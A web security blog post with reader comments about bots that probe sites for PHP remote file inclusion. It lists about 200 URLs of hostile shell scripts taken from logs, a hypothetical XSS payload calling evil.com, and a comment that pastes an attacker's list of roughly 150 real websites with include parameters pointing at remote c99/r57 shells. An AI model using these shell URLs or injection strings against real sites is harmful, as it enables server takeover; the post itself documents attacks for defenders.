Cenzic 232 Patent
Paid Advertising
web application security lab

PHP Include Robots

I’ve been toying around quite a bit with robots who attempt to exploit the site in various ways. I’ve been seeing an interesting shift in robots that are moving away from direct exploitation until they detect that it is exploitable. That is interesting because it’s reducing the risk of someone just connecting to the script, downloading it and connecting to the controlling IRC servers. Here’s the list I got in today’s log file (please use extreme caution when viewing these - they are intentionally hostile in unknown ways):

http://2zero.by.ru/bot/echo.txt
http://38.99.89.50/.r/echo.txt
http://38.99.89.50/echo.txt
http://59.25.189.83/~upload/tt
http://66.235.205.131/echo
http://72.29.94.218/scr/evl.txt
http://80.86.105.122/echo.txt
http://afcomdfw.org/echo
http://albapower.de/id.txt
http://aldy.deep-ice.com/99.txt
http://aldy.deep-ice.com/mitra/echo.txt
http://aldy.ifastnet.com/xpl/echo.txt
http://alienr0x.by.ru/.spreag.txt
http://alienr0x.by.ru/r57.txt
http://andravarldar.se/cmd
http://arva.medusanetwork.com/echo.txt
http://az.co.cz/foto/c9.txt
http://b4ngs4t.com/echo
http://bacaplume.free.fr/manager/frontinc/services.txt
http://bavatuesdays.com//wp-content/plugins/wordtube/n00gr00d.txt
http://bb.domaindlx.com/armee/x.txt
http://br.geocities.com/darkteam4ever/echo.txt
http://br.geocities.com/porfook/engine.txt
http://bristoloakpaintballclub.com/calendar/calendar/includes/js/.,/.,/.,/test.txt
http://buceta.789mb.com/cmd1.txt
http://busca.uol.com.br/uol/index.html
http://bwlist.altervista.org/stringa.txt
http://chireo.info/n00gr00d.txt
http://clubmusic.caucasus.net/f22.txt
http://cmdfile.ifastnet.com/cmd/57.txt
http://cmdfile.ifastnet.com/cmd/a.txt
http://coccor0x.altervista.org/response.txt
http://d3prive.my-place.us/id.txt
http://d4rk4ir.altervista.org/r57.txt
http://dandorohoi.0catch.com/.r/echo.txt
http://deporpasto.com/portal/components/com_smo_ajax_shoutbox/languages/cmd.do
http://detroit.my-php.net/id.txt
http://dezzign.ru/echo
http://diving.actionpro.cz/galerie/tmp/vob.txt
http://dj.eliteradio.info/ech21o.txt
http://dj.eliteradio.info/echo.txt
http://drxrwx.ifastnet.com/57.txt
http://drxrwx.ifastnet.com/a.txt
http://dvl.by.ru/cmd/r57shell.txt
http://ebrain.netfast.org/r57
http://efardella.cinet.it/claroline/phpbb/id.txt
http://emi.faccat.br/coisasdowindovaio/freeman.txt
http://empore.altervista.org/rox.txt
http://equipexapadao.com/echo
http://faillurecorp.iespana.es/evals.txt
http://faillurecorp.iespana.es/id.txt
http://for-a.co.in/vulgar.htm
http://founder-poltekcrews-allnetwork.org/echo
http://freewebs.com/celinho/id.txt
http://freewebs.com/sak4w/r57.txt
http://geocities.com/surabayateam/vulgar.gif
http://gnuworld.evolink.ro/xxx/3739.echo.txt
http://h1.ripway.com/eownz/id.txt
http://h1.ripway.com/h4ck/echo.txt
http://h1.ripway.com/overcashxd/echo
http://h1.ripway.com/thc/id.txt
http://hacker.to.md/Qe3
http://hacker.to.md/mesin
http://hacker.to.md/x
http://happy.altervista.org/name.txt
http://heidik.org/y/id.txt
http://heritagelost.net/phpraid/cmd.txt
http://hokkian.dalnetz.biz/cibe.txt
http://ht-o.de/hto/images/echo
http://ikhlas.com.my/57.txt
http://ikhlas.com.my/cmd.txt
http://int0xic.by.ru/id.txt
http://jargo.phpnet.us/ilkom.txt
http://k52.jp/echo
http://kaoru-t.com/cache/echo.txt
http://kretenovich.phpnet.us/cmd.gif
http://l3to.by.ru/id.txt
http://lamerma.com.ve/n00gr00d.txt
http://lifechangerscc.com//catalog/includes/asd.txt
http://lifechangerscc.com//catalog/includes/cmd.txt
http://lppm.uns.ac.id/r57.txt
http://luis.infopiera.com/evl.txt
http://mabiographie.fr/httaccess
http://maxdemon.1sthost.org/docs/robot.txt
http://members.lycos.co.uk/modelteam/echo.txt
http://mensagem.us/hack/echo
http://multiplex.netfast.org/stringa.txt
http://nainty.xlphp.net/c99.txt
http://napushenko.phpnet.us/evl.txt
http://nemecsek87.altervista.org/ciao.jpg
http://netbarg.com/admin/backups/id.txt
http://new.bacone.edu/mambo/help.txt
http://niigatakubota.co.jp/.defacer/.secret/echo
http://nikkeydetetives.com/over/echo
http://nocommercial.altervista.org/my/nc.txt
http://norman.webspacemania.com/id.txt
http://norman.webspacemania.com/r57.txt
http://nosaj.1sweethost.com/freeman.txt
http://nxlf.cn/1
http://offzinho.netfast.org/57
http://openl4b.altervista.org/CMD.txt
http://partyaccess.net/2007/components/com_extcalendar/echo
http://pasto.com/administrator/components/safe.txt
http://perdu.ch/cgi-bin/echo
http://portal.isara.fr/claro151grain/claroline/auth/ldap/…bl/…/stringa.txt
http://priv8.netfast.org/cmd/r57.gif
http://putogame.webspacemania.com/r57.txt
http://putogame.webspacemania.com/safe.txt
http://raz0r-sh4rks.org/id.txt
http://redza.t35.com/xpl/injek
http://reshack.ifastnet.com/xpl/xpl.txt
http://rizla2.interfree.it/p.txt
http://rootkay.by.ru/id.txt
http://rotaryclub-fulham.org//components/com_extcalendar/cmd.txt
http://rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://sanwall.info/echo.txt
http://scan.prohosts.org/echo.txt
http://serc.ilc.edu.tw/echo
http://site.netspace.pt/media/echo.php
http://sniffo.by.ru/SuPrEmO.txt
http://stip-city.org/evl.txt
http://suntikan.org/echo
http://sup3rskunk.interfree.it/c99.txt
http://sup3rskunk.interfree.it/o.txt
http://symboliclynx.com/images/a
http://tauzendmark.ro/.r/echo.txt
http://thebadfox.jeeran.com/c99.txt
http://thedivaslist.com/.r/echo.txt
http://thelostsummer.com/x.do
http://theoriginalista.altervista.org/unix/no.txt
http://topnlpsites.com/images/gif/echo.txt
http://tosa.altervista.org/stringa.txt
http://treo.palmtop.pl/klub/Cmd.txt
http://ulil.xlphp.net/msn/msn
http://va7in.phpnet.us/vhv
http://valdhano.phpnet.us/gfs
http://valdhano.phpnet.us/vhv
http://varmvaffel.no-ip.com/andy/c99.txt
http://vcsok.com/echo
http://vegeta.co.jp/echo
http://vh1.srt.com.cn/sewam/c99.txt
http://waou.altervista.org/r57.txt
http://woodshack.com/components/com_phpshop/shop_image/help/freeman.txt
http://www.247live7.com/diablocrew/cmd.txt
http://www.Leonard0.kit.net/echo.txt
http://www.activekitten.com//bitrix/updates/ciola.txt
http://www.apnic.net/index.html
http://www.article-website.co.uk/admin/backup/RipperzCrewz
http://www.asqbuffalo.org/backups/freeman.txt
http://www.bastardirc.net/scan5.txt
http://www.bewahrer-azeroth.de/phpraid//raid_lua/asd.txt
http://www.chv.ro/cache/0day
http://www.defi.isep.ipp.pt/~jaa/cache/a
http://www.dgsport.be/components/res.txt
http://www.eclypse.info/oche
http://www.ekin0x.com/r57.txt
http://www.equipexapadao.com//id.txt
http://www.equipexapadao.com/echo
http://www.equipexapadao.com/id.txt
http://www.esto.sky7.us/RipperzCrewz
http://www.esto.sky7.us/SECRET.c
http://www.facepi.com.br/cache/…/botnet/out2.txt
http://www.fena.nu//components/com_rsgallery/r57rex.txt
http://www.freewebs.com/alezinn/n00gr00d.txt
http://www.geocities.com/junlee_180/metro/yeyen.txt
http://www.geocities.com/kampusunika/lamercrew.txt
http://www.geocities.com/kharisma_usada_mustika/checkit.txt
http://www.gonfiabiligamespark.it/flash/r57.txt
http://www.gritservice.it/r57.txt
http://www.hanovercova.us/business/x.txt
http://www.himagara-unila.com/x.do
http://www.k1ll3rx.addr.com/id.txt
http://www.kebcomputer.com/cache/error.txt
http://www.kebcomputer.com/cache/tess.txt
http://www.kebcomputer.com/cache/tests.txt
http://www.kelserific.xpg.com.br/tool25.txt
http://www.kendera.com.br/mvk.txt
http://www.leonard0.kit.net/echo.txt
http://www.modulardepot.com/smallimages/help/freeman.txt
http://www.mvmedia.com/old/Cmd.txt
http://www.mydezent.de/dload/pdl-gfx/ciola.txt
http://www.panglimacollection.com/titid.gif
http://www.panglimacollection.com/titid.txt
http://www.phazethree.com/shoponline/images/CMD.txt
http://www.pic4.us/pic/wvj89367.gif
http://www.private-scan.kit.net/evl.txt
http://www.pronext.eu/help/a.txt
http://www.propgpq.uece.br/mdb/echo
http://www.raaness.no/a
http://www.rhino-invest.info/FIP/id.txt
http://www.rpgnet.com/images/m4f14d3c4lc1nh4.txt
http://www.stockgoeroe.com/main.txt
http://www.subway56.com/delivery/modules/maindisplay/id.txt
http://www.sunshinefalls.com/Templates/.m/string.jpg
http://www.t5kclan.com/echo
http://www.tarcisiobr.kit.net/echo.txt
http://www.telecom.conexlink.com/includes/cache_tpls/freeman.txt
http://www.the-esao.com/imag/stringa.txt
http://www.thedivaslist.com/.r/echo.txt
http://www.thegrumbleweeds.com/pubgal/freeman.txt
http://www.thelostsummer.com/x.do
http://www.thiaguinho.net/id.txt
http://www.trendsturm.de/catalog/includes/help/freeman.txt
http://www.triton.xpg.com.br/biscate.txt
http://www.ugurfotograf.com/resources/incoming/a.txt
http://www.velozbr.netfast.org/Cmd/r57.txt
http://www.vortex2.altervista.org/cmd.txt
http://www.wantme.ca/cache/.,/.,/.,/test.txt
http://www.webbmakaren.se/test/admin/img/help/cmd.txt
http://www.webbmakaren.se/test/admin/img/help/freeman.txt
http://www.wow-insomnia.com/images/cmd.txt
http://www.yotasurf.co.uk/coppermine/albums/CMD.TXT
http://www.yufa.spb.ru/modules/coppermine/include/main.txt
http://www1.greenpeace.org.hk/camp/id.txt
http://xmlstuff.ifastnet.com/cmd/cmdx.do
http://xoomer.alice.it/hackz/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/no.php
http://xoomer.alice.it/marian0zx/ahah/solo.php
http://xoomer.alice.it/uploadftp/r57rex.txt
http://xpl46.altervista.org/config.txt
http://xpls.my-place.us/own.txt
http://younes.by.ru/c99.txt

You’ll notice an awful lot of “echo” versions which (when still valid) return content like:

<? echo "1122548"; ?>

Apparently others have seen this as well so it’s not just me. This is a shift in tactics that will no doubt have a big impact on the survivability of bot-nets as they will be more difficult to detect. The only problem is that the numbers don’t appear to be dynamic. It won’t take long to correct that, which will mean that seeing what the bots are doing will require honeypots. It’ll be interesting to see the bots evolve over time.

16 Responses to “PHP Include Robots”

  1. Awesome AnDrEw Says:

    I find a couple hundred attempts to load c99 PHP shells each and every day rifling through my domain logs. Usually they are in the form of a text file, or image, but in some cases the file does not even exist. It’s still a pain in the ass though.

  2. kuza55 Says:

    Here’s an interesting proposal:

    If the bots submit a file which looks like this:

    <? echo “<script src=’http://evil.com/xss.js’></script>”; ?>

    What do you do?

    If you echo the content back, then you’ve just created yourself an XSS hole, but if you don’t echo it back, then you can’t find what the bot is doing.

    And there is no way to emulate that kind of response without giving it so unlike a payload which checks databases or reads files, you have to let it do some damage.

  3. sil Says:

    I see these in my log constantly. What I’ve been noticing more of are bots that are using HTTP REFERRERS from my own site. E.g. this was a pesky little thing for a minute until I blocked it with mod_security and a chain. An easy way with mod security is something like this which I’ve tested and currently implemented in the last 36 hours…

    # Anyone coming in… Check them
    SecFilterSelective REQUEST_URI “/index.php” chain

    # If they’re injecting any http string redirect them…
    SecFilterSelective REQUEST_URI “.*http://*” redirect:http://www.infiltrated.net/sorry.jpg

    # Anyone circumventing garbage… redirect them too but send their PC into memory overload
    SecFilterSelective REQUEST_URI “.*amp;do” redirect:http://www.infiltrated.net/stupidIE.html

    # Anyone visiting this site… I didn’t refer you… If you want to pretend like I did… You too can get das boot and have your machine overloaded…
    SecFilterSelective REQUEST_URI “.*item=35″ chain
    SecFilterSelective HTTP_REFERER “http://www.infiltrated.net/index.php?id=news&do=2&item=35″ redirect:http://www.infiltrated.net/stupidIE.html

    Now I noticed after these rules were in place, there were a few hosts trying to shift things around so I played with them until I got bored and created the mod_security+htaccess+personal_script to auto ipf em from connecting for a week…

    Sup zeno and rs (if you read this) … sil

  4. jody Says:

    ugh, check out irc.gigachat.net:6667 - referenced in a few of these php bots.

    it’s NOTHING BUT .br ddos kiddies…

    most popular channel is #DDOS :

    * Topic is ‘#DDOs Amigos, SCAN’s Tudo aqui =] Quer Registros? Conquiste! CMD –> http://vnc2007.netfast.org/tr57.txt? / Mudanas estao para acontecer e novidades tambm..! http://www.milw0rm.com/author/53′

    * Now talking in #aod
    * Topic is ‘Angels of Death team: Neogenik - bapoz - mephisto - Darkrevenge | Xpl1: http://www.injek.cc/xpl/ | Xpl2: http://www.adek.org/xpl/ |cmd: http://andravarldar.se/cmd? | BotScan: http://AoD.tiagow.us/botscan.txt |News: DarkRevenge coding CMD for Sony PSP’

    * Now talking in #wWw.cOm
    * Topic is ‘CMD = http://cmdfile.ifastnet.com/cmd/a.txt? | XPL = http://www.adek.org/xpl/ - (@Scan)(Online) - Type - !scan | Don’t flood bot ! ‘

    and so on, and so on….

    *sigh*

  5. jody Says:

    Addendum:

    From a channel topic: http://www.xshqiptaretx.org/SHELLZ.txt

    #*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
    #WELCOME TO - ALBANIA.SECURITY.CLAN-
    #
    #PUBLIC VULNERABILLITY COLLECTION BY:
    #
    #”~A.S.C TEAM~”: Mafia_Boy, Anonymous, CoNtRoLLeR, A^L^B^A^N^I^A^^, NiNja, r0Y, W0rLD, MaSteR, Zetha, Zap, JaheeM!!!
    #
    #ENJOY - HAVE FUNN
    #
    #*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#
    #VuLNeRaBiLiTY SHELLZ By ALBANIA.SECURITY.CLAN STAFF @ IRC.FIER1.COM - IRC.UNIXHELL.COM - IRC.FIERICLAN.NET ) #
    #*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*=*#

    THE BEST WORLD OF A NEW STYLE OF LIFE 100% PUR ILLEGAL SHAKING

    http://www.cenip.com.ar/demo/cenip/index.php?W=http://az.co.cz/foto/c9.txt?
    http://www.stlofficespace.com/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.ldp.nu/Index2.php?page=http://az.co.cz/foto/c9.txt?
    http://www.igaci.com.ar/main.php?id=http://az.co.cz/foto/c9.txt?
    http://www.scubacat.nl/index.php?pagina=http://az.co.cz/foto/c9.txt?
    http://www.smigroup.it/service/reserved/home.php?page=http://az.co.cz/foto/c9.txt?
    http://www.mtssro.cz/joomla/administrator/components/com_remository/admin.remository.phpmosConfig_absolute_path=http://az.co.cz/foto/c9.txt?
    http://www.cantorelli.com/Services.php?dest=http://az.co.cz/foto/c9.txt?
    http://www.arabischfueralle.de/index.php?action=http://az.co.cz/foto/c9.txt?
    http://www.alleanzanazionaleroccasecca.it/giornale/directory/moduli/index.php?moduleName=http://az.co.cz/foto/c9.txt?
    http://www.beathovens.de/main.php?dat=http://az.co.cz/foto/c9.txt?
    http://www.bacultural.com/fr/home.php?module=http://az.co.cz/foto/c9.txt?
    http://www2.rcenter.com.br/index2.php?idpx=http://az.co.cz/foto/c9.txt?
    http://www.ixoxrwma.gr/index.php?lang=http://az.co.cz/foto/c9.txt?
    http://www.nipponnews.net/contact.php?ln=http://az.co.cz/foto/c9.txt?
    http://www.spoma.com/index.php?stranka=http://az.co.cz/foto/c9.txt?
    http://www.acquistoonline.org/main.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.fausernet.novara.it/~itisleon/2005/indice.php?link=http://az.co.cz/foto/c9.txt?
    http://www.dce.ufc.br/pagina.php?arquivo=http://az.co.cz/foto/c9.txt?
    http://www.maber.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.holoscapital.com.ar/home.php?seccion=http://az.co.cz/foto/c9.txt?
    http://www.dntar.ro/index.php?location=http://az.co.cz/foto/c9.txt?
    http://www.impulsa.info/home.php?seccion=http://az.co.cz/foto/c9.txt?
    http://www.oratv.org/show.php?page=http://az.co.cz/foto/c9.txt?
    http://www.kvazar.com.ua/main.php?p=http://az.co.cz/foto/c9.txt?
    http://www.svtharde5.nl/index.php?&item=http://az.co.cz/foto/c9.txt?
    http://www.mohtagin.net/script/greats/index.php?get=http://az.co.cz/foto/c9.txt?
    http://www.buffetcenter.com.br/principal/principal.php?principal=http://az.co.cz/foto/c9.txt?
    http://www.roseimoveis.com.br/internas.php?modo=http://az.co.cz/foto/c9.txt?
    http://www.marasport.ca/main.php/main.php?section=http://az.co.cz/foto/c9.txt?
    http://www.feneo.com/links/info.php?page=http://az.co.cz/foto/c9.txt?
    http://www.northtrading.com.ar/spa/index.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.sma.df.gob.mx/educambiental/index.php?op=http://az.co.cz/foto/c9.txt?
    http://www.laopinionhgo.com/index.php?pagina=http://az.co.cz/foto/c9.txt?
    http://www.meupixel.com/index.php?secao=http://az.co.cz/foto/c9.txt?
    http://www.hlm2u.biz/main.php?p=http://az.co.cz/foto/c9.txt?
    http://www.proteg.net/index.php?l1=http://az.co.cz/foto/c9.txt?
    http://www.newstalk650.com/yourcityyourvote/index.php?right=http://az.co.cz/foto/c9.txt?
    http://www.informaticasim.net/base.php?id=http://az.co.cz/foto/c9.txt?
    http://www.robertbue.net/index.php?side=http://az.co.cz/foto/c9.txt?
    http://www.holistic.com.br/daniel/index.php?pg=http://az.co.cz/foto/c9.txt?
    http://www.stormspear.com/start.php?page=http://az.co.cz/foto/c9.txt?
    http://www.interights.org/page.php?dir=http://az.co.cz/foto/c9.txt?
    http://www.jhchemi.co.kr/main.php?goFile=http://az.co.cz/foto/c9.txt?
    http://carnauba.cpamn.embrapa.br/qasap/index.php?id=http://az.co.cz/foto/c9.txt?
    http://www.prudenmax.com.br/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
    http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
    http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
    http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
    http://www.powerrex.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.granada.sk/tangoklub/index.php?content=http://az.co.cz/foto/c9.txt?
    http://www.urbanainmobiliaria.com.ar/pagina.php?medio=http://az.co.cz/foto/c9.txt?
    http://www.membran.net/db_php_eng/index.php?action=http://az.co.cz/foto/c9.txt?
    http://www.damianbenetucci.com.ar/damian/photo.php?section=http://az.co.cz/foto/c9.txt?
    http://www.spyro.info/sumo/main.php?section=http://az.co.cz/foto/c9.txt?
    http://www.actiu.com/new05/home/home.php?pagina=http://az.co.cz/foto/c9.txt?
    http://www.alhourriah.org/print.php?page=http://az.co.cz/foto/c9.txt?
    http://www.beeethoven.de/index.php?site=http://az.co.cz/foto/c9.txt?
    http://www.ammin.uniss.it/nucleodivalutazione/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.oleriny.cz/info.php?co=http://az.co.cz/foto/c9.txt?
    http://www.aerospool.sk/no100/index.php?str=http://az.co.cz/foto/c9.txt?
    http://www.vanherkkaas.nl/shop.php?middle=http://az.co.cz/foto/c9.txt?
    http://www.bgteam.co.kr/bbs_free.php?page=http://az.co.cz/foto/c9.txt?
    http://www.saudeclass.com.br/default.php?lnk=http://az.co.cz/foto/c9.txt?
    http://www.vodnanskaryba.eu/www/index.php?middle=http://az.co.cz/foto/c9.txt?
    http://www.lyshaus.com/index.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.gginsam.com/shop.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.gobest.idv.tw/index.php3F/archives/38SQLSERVER.html=http://az.co.cz/foto/c9.txt?
    http://www.todopescajunin.com.ar/index.php?seccion=http://az.co.cz/foto/c9.txt?
    http://www.filharmonia.zabrze.pl/page.php?id=http://az.co.cz/foto/c9.txt?
    http://www.toolscope.com/main.php?section=http://az.co.cz/foto/c9.txt?
    http://www.wilka.pl/main.php?s=http://az.co.cz/foto/c9.txt?
    http://www.ccpc.org.ve/home.php?seccion=http://az.co.cz/foto/c9.txt?
    http://www.eminemlounge.com/index.php?id=http://az.co.cz/foto/c9.txt?
    http://www.jak.netonline.ch/index.php?main=http://az.co.cz/foto/c9.txt?
    http://www.cevolved.com/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.tecnicaweb.es/contenido.php?a=http://az.co.cz/foto/c9.txt?
    http://www.hchheren9.nl/index2.php?phppage=http://az.co.cz/foto/c9.txt?
    http://www.rgarden.com/vitalize/index.php?showpage=http://az.co.cz/foto/c9.txt?
    http://www.shoto.nl/ko/layout.php?page=http://az.co.cz/foto/c9.txt?
    http://www.lingera.ch/index.php?id=http://az.co.cz/foto/c9.txt?
    http://www.rydebacksrf.se/www/live.php?action=http://az.co.cz/foto/c9.txt?
    http://www.inverigohotel.it/main.php?pagina=http://az.co.cz/foto/c9.txt?
    http://www.mimmediaevent.nl/php/template.php?showPage=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.maureensherbondy.com/index.php?url=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.sager1.de/sebastian/index.php?site=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.jonshpk.com/shqip.php?kat=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.globosaude.com.br/index1.php?pagina=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.vein.hu/www/intezetek/fdsz/szak_szerv/ulesek/generate.php?ev=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.satelliterecords.com/live/index.php?dept=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.unipanamericana.edu.co/index.php?pag=http%3A%2F%2Fphpshell.mackatack.com%2Fsource.txt%3F&&s=r&
    http://www.eurooknattk.cz/nove/ne/index1.php?adresa=http://az.co.cz/foto/c9.txt?
    http://www.3i5i.de/blank.php?path=http://az.co.cz/foto/c9.txt?
    http://www.tronix.nl/print.php?pagina=http://az.co.cz/foto/c9.txt?
    http://www.vein.hu/www/intezetek/koz_tan/test_ulesek/generate.php?ev=http://az.co.cz/foto/c9.txt?
    http://www.readaboutstuff.com/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.goldmarket.ro/ro/start.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.paulinazamora.com/home.php?seccion=http://az.co.cz/foto/c9.txt?
    http://www.weblampjes.nl/weblampjes/lamp/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.allantiquity.com/index.php?page2=http://az.co.cz/foto/c9.txt?
    http://www.imspeople.net/index.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.valenza.it/index.php?pag=http://az.co.cz/foto/c9.txt?
    http://www.entertainmenthardware.com/Rentals/main.php?script=http://az.co.cz/foto/c9.txt?
    http://www.gerryweberag.de/investorrelations.php?lang=http://az.co.cz/foto/c9.txt?
    http://www.theimagecians.com/ara/index_ar.php?page=http://az.co.cz/foto/c9.txt?
    http://www.ablopesukarhu.com/main.php?sivu=http://az.co.cz/foto/c9.txt?
    http://www.achplv.sk/index.php?str=http://az.co.cz/foto/c9.txt?
    http://www.idrate.net/index.php?goto=http://az.co.cz/foto/c9.txt?
    http://www.helenandthepoorboys.de/galerien/show.php?galnr=http://az.co.cz/foto/c9.txt?
    http://www.ezindus.com/main.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.jungo8949.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.italyum.com/recipes/recipe.php?recipe=http://az.co.cz/foto/c9.txt?
    http://www.fillattice.com/modello_blue.php?file=http://az.co.cz/foto/c9.txt?
    http://www.offisolution.co.kr/shop.php?goFile=http://az.co.cz/foto/c9.txt?
    http://www.gbinline.org.uk/index.php?left=http://az.co.cz/foto/c9.txt?
    http://www.rocknation.dk/?mainpage=http://az.co.cz/foto/c9.txt?
    http://www.afterimagemedia.net/template.php?x=http://az.co.cz/foto/c9.txt?
    http://www.karko.de/index2.php?page=http://az.co.cz/foto/c9.txt?
    http://www.presbyconstruction.com/page.php?id=http://az.co.cz/foto/c9.txt?
    http://www.transpress.bg/insidede.php?cont=http://az.co.cz/foto/c9.txt?
    http://www.orthototaal.nl/template.php?template=http://az.co.cz/foto/c9.txt?
    http://www.termodom.com.ua/index1.php?cur_page=http://az.co.cz/foto/c9.txt?
    http://www.gylleneskor.se/interview/interview_prev.php?display=http://az.co.cz/foto/c9.txt?
    http://www.mchead.net/portfolio.php?port=http://az.co.cz/foto/c9.txt?
    http://www.francadibenedetto.com/index.php?page=http://az.co.cz/foto/c9.txt?
    http://www.kubestahl.de/index2.php?language=http://az.co.cz/foto/c9.txt?
    http://www.linz24.at/index.php?site=http://az.co.cz/foto/c9.txt?
    http://www.chuvavasco.com/main.php?header=http://az.co.cz/foto/c9.txt?
    http://www.blogs.com.br/dicas/index.php?id=http://az.co.cz/foto/c9.txt?
    http://www.nordinbatik.com/main2.php?p=http://az.co.cz/foto/c9.txt?
    http://www.lndnoticias.com.ar/html/modules/My_eGallery/public/displayCategory.php?basepath=http://az.co.cz/foto/c9.txt?
    http://www.enneciesse.com/Sum/index2.php?var=http://az.co.cz/foto/c9.txt?
    http://www.city-hunter.it/tamburi/index2.php?cont=http://az.co.cz/foto/c9.txt?
    http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?%00
    http://singmitsommer.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
    http://www.ascherslebener.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00&eintrag_start=0
    http://www.bg-sektion-harz.de/index2.php?inhalt=http://az.co.cz/foto/c9.txt?=%00
    http://www.partyandmore.net/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
    http://www.performance-analysis.com/index2.php?action=http://az.co.cz/foto/c9.txt?=%00
    http://www.kennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=http://az.co.cz/foto/c9.txt?=%00&rpic=rlink/rpic_history.php
    http://www.mohiulislam.com/index2.php?page=text/history.php&rlink=rlink/rlink_profile.php&rpic=http://az.co.cz/foto/c9.txt?=%00
    http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=13
    http://www.dynamicssoftware.com/index2.php?page=Home%20page&sub=http://az.co.cz/foto/c9.txt?=%00&content=12
    http://www.davidkennerly.com/fineart/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.godwinbooks.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.abbotthillramblers.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://pacelighting.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://mbenazet2.free.fr/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.irctrials.com/sponsors/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.harmaraccess.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.ohioschoolplan.org/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.orbitedu.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Sunday%20Test
    http://www.andrubemis.com/index2.php?page=http://az.co.cz/foto/c9.txt?=%00
    http://www.chestnutgrove.wandsworth.sch.uk/index2.php?page=http://az.co.cz/foto/c9.txt?=%00&name=Admissions
    http://www.royvervoort.nl/vieux-sarrazac/index2.php?language=nl&content=http://az.co.cz/foto/c9.txt?=%00&SubMenu=0
    http://www.klidapohoda.cz/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
    http://absolute-destiny.net/music/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
    http://sc.absolute-destiny.net/index2.php?x=http://az.co.cz/foto/c9.txt?=%00
    http://www.infocentrum.opava.cz/index2.php?file=http://az.co.cz/foto/c9.txt?=%00&menu=4
    http://www.intensecaraudio.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
    http://www.pmd-webdesign.de/gfxroom2/index2.php?site=http://az.co.cz/foto/c9.txt?=%00&i=0
    http://www.monnerecher-musek.net/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
    http://www.schulen.li/rss/schulseite/index2.php?site=http://az.co.cz/foto/c9.txt?=%00
    http://www.neptun-club.com.ua/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
    http://www.dorisankarberg.se/index2.php?dir=http://az.co.cz/foto/c9.txt?=%00
    http://nagelstudio-overberg.de/index2.php?dat=http://az.co.cz/foto/c9.txt?=%00
    http://www.gemeinde-gerwisch.de/index2.php?link=http://az.co.cz/foto/c9.txt?=%00
    http://www.consultyou.ch/index2.php?link=http://az.co.cz/foto/c9.txt?=%00&link2=About%20us
    http://www.galaentertainment.se/index2.php?link=http://az.co.cz/foto/c9.txt?=%00

    ([if That CMD Doen’t Work Wuse This:=> rocksv.com/c99.txt? az.co.cz/foto/c9.txt? phpshell.mackatack.com/source.txt? andravarldar.se/cmd? http://vh1.srt.com.cn/sewam/c99.txt? ])

